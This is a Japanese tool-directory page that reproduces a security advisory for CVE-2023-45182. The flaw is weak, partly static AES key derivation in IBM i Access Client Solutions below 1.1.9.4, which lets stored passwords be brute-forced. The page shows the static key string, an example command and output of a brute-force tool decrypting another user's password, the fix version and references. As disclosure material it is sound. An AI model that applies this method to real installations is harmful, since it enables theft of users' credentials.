Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-45182 — IBM i Access Client Solutions < 1.1.9.4 - 弱いパスワード暗号化 | Kitploit
ツール/GitHubGitHub/afine-com/cve-2023-45182
パスワードクラッキング暗号化/復号化ツール脆弱性分析エクスプロイト暗号化
GitHubafine-com/cve-2023-45182

CVE-2023-45182

IBM i Access Client Solutions < 1.1.9.4 - 弱いパスワード暗号化

リポジトリを見る
2年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-45182

IBM i Access Client Solutions < 1.1.9.4 - 脆弱なパスワード暗号化

タイムライン

  • ベンダーに脆弱性を報告: 22.09.2023
  • 修正済みバージョン1.1.9.4のリリース: 08.12.2023
  • 公開開示: 15.12.2023

説明

IBM i Access Client Solutionsはユーザーパスワードの保存にAESアルゴリズムを使用していますが、16バイトの暗号化キーは静的文字列(Thanatos)と、別の静的文字列(Behemoth)にユーザー名、ユーザーのホームフォルダ、OS(例:Linux)、およびアプリケーションが起動されたカレントディレクトリを組み合わせた文字列からのランダムな文字の組み合わせです。その結果、暗号化キーの半分は静的(文字列Thanatos)であり、残りの半分は非常に限定的です。これにより、攻撃者はシングルCPUコアでもパスワードを非常に簡単にブルートフォースできます。

以下は、mkubiakアカウントからas400_password_bruteforce_tool.javaスクリプトを使用してmmajchrowiczユーザーのパスワードを復号化した例です:

root@kitploit:~
┌──(mkubiak㉿localhost)-[/tmp/mkubiak]
└─$ java as400_password_bruteforce_tool.java mmajchrowicz_funciton_admin_work.bin Linux mmajchrowicz /opt

IBM AS400 Password Bruteforce Tool v0.3 by Michał Majchrowicz AFINE Team

Full keyspace: mmajchrowiczLinux/opt/home/mmajchrowiczBehemoth
Full keyspace length: 47

Reduced keyspace: BmajchrowizLnux/pte
Reduced keyspace length: 19

Found good pass: Thanatosaun/Lcmo

Encrypted system password 7 bytes:
2E 1B 10 0A 1B 0D 0A
Decrypted system password 7 bytes:
50 65 6E 74 65 73 74

Decrypted system password: Pentest

この問題は、脆弱なパスワード暗号化の適用によって引き起こされました。この問題はIBM i Access Client Solutions 1.1.9.4で修正されています。

影響を受けるバージョン

< 1.1.9.4

アドバイザリ

IBM i Access Client Solutionsを1.1.9.4以降に更新してください。

参考文献

  • https://www.ibm.com/support/pages/node/7091942
  • https://nvd.nist.gov/vuln/detail/CVE-2023-45182
ツールをダウンロード